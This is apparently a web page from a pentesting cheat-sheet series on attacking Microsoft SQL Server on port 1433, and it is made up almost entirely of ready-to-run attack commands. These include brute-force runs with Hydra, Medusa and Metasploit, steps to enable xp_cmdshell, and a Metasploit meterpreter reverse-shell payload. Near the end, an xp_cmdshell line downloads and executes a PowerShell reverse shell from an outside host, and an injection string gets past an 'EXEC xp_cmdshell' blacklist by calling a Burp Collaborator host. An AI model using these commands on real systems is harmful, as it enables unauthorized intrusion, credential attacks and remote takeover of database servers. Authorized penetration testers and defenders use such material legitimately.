MSSQL (Microsoft SQL Server) - Port 1433

Master pentesting MSSQL on port 1433 with VeryLazyTech’s guide—exploits, tips, and more!

PreviousJava RMI - RMI-IIOP - Port 1098/1099/1050 NextFile Transfer Cheatsheet: Windows and Linux

Last updated 1 month ago

Was this helpful?

MSSQL (Microsoft SQL Server) - Port 1433

Master pentesting MSSQL on port 1433 with VeryLazyTech’s guide—exploits, tips, and more!

Become VeryLazyTech ! 🎁
Follow us on:
- ✖ Twitter .
- 👾 Github .
- 📜 Medium .
Visit our for e-books and courses. 📚
Support us and . ☕

Basic info

MSSQL is designed to store and retrieve data as requested by applications. Its features include:

Default Port: TCP/1433 for standard communication.
Authentication Modes:
- Windows Authentication
- Mixed Mode (Windows and SQL Server Authentication)
Common Uses:
- Data storage for web applications, enterprise systems, and reporting services.

While MSSQL provides robust security features, misconfigurations, weak authentication, and unpatched vulnerabilities can expose it to attacks.

Banner Grabbing

Banner grabbing helps identify the MSSQL server version, authentication modes, and potential vulnerabilities.

Tools and Commands:

Telnet (basic connection test):
```
telnet <IP> 1433
```

Nmap:

nmap -sV -p 1433 --script ms-sql-info <IP>

Example Output:

1433/tcp open ms-sql-s Microsoft SQL Server 2019 RTM

Metasploit Framework:

msfconsole
use auxiliary/scanner/mssql/mssql_ping
set RHOSTS <IP>
run

Authentication Bypass Techniques

Null Authentication

If SQL Server is misconfigured, it may allow unauthenticated access:

Testing Null Authentication:
```
sqsh -S <IP> -U "" -P ""
```

MSSQL Brute Force Attacks

Brute force attacks can help identify weak or default credentials.

Hydra:

hydra -L usernames.txt -P passwords.txt mssql://<IP>

Medusa:

medusa -h <IP> -u <username> -P passwords.txt -M mssql

Metasploit Auxiliary Module:

msfconsole
use auxiliary/scanner/mssql/mssql_login
set RHOSTS <IP>
set USER_FILE usernames.txt
set PASS_FILE passwords.txt
run

MSSQL Enumeration

Key Enumeration Techniques:

Identify Databases:
```
SELECT name FROM sys.databases;
```
List Users:
```
SELECT name FROM sys.syslogins;
```
Server Information:
```
SELECT @@version;
```

Extract Privileges:

SELECT * FROM fn_my_permissions(NULL, 'DATABASE');

Automated Enumeration:

Metasploit:

use auxiliary/admin/mssql/mssql_enum
set RHOSTS <IP>
run

Exploitation Techniques

Command Execution via xp_cmdshell

xp_cmdshell allows executing OS commands from SQL Server.

Enable xp_cmdshell:

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

Execute Commands:
```
EXEC xp_cmdshell 'whoami';
```

Privilege Escalation

Use known vulnerabilities or misconfigurations to escalate privileges:

CVE-2020-0618 (SQL Reporting Services RCE): Exploit unpatched SQL Reporting Services.

Metasploit Module for Privilege Escalation:

use exploit/windows/mssql/mssql_payload
set RHOST <IP>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <your_IP>
run

Execute OS Commands

Note that in order to be able to execute commands it's not only necessary to have xp_cmdshell enabled, but also have the EXECUTE permission on the xp_cmdshell stored procedure. You can get who (except sysadmins) can use xp_cmdshell with:

Use master
EXEC sp_helprotect 'xp_cmdshell'
# Username + Password + CMD command
crackmapexec mssql -d <Domain name> -u <username> -p <password> -x "whoami"
# Username + Hash + PS command
crackmapexec mssql -d <Domain name> -u <username> -H <HASH> -X '$PSVersionTable'

# Check if xp_cmdshell is enabled
SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';

# This turns on advanced options and is needed to configure xp_cmdshell
sp_configure 'show advanced options', '1'
RECONFIGURE
#This enables xp_cmdshell
sp_configure 'xp_cmdshell', '1'
RECONFIGURE

#One liner
EXEC sp_configure 'Show Advanced Options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

# Quickly check what the service account is via xp_cmdshell
EXEC master..xp_cmdshell 'whoami'
# Get Rev shell
EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.13:8000/rev.ps1") | powershell -noprofile'

# Bypass blackisted "EXEC xp_cmdshell"
'; DECLARE @x AS VARCHAR(100)='xp_cmdshell'; EXEC @x 'ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net' —

Support VeryLazyTech 🎉

Follow us on:

PreviousJava RMI - RMI-IIOP - Port 1098/1099/1050 NextFile Transfer Cheatsheet: Windows and Linux

Last updated 1 month ago

Was this helpful?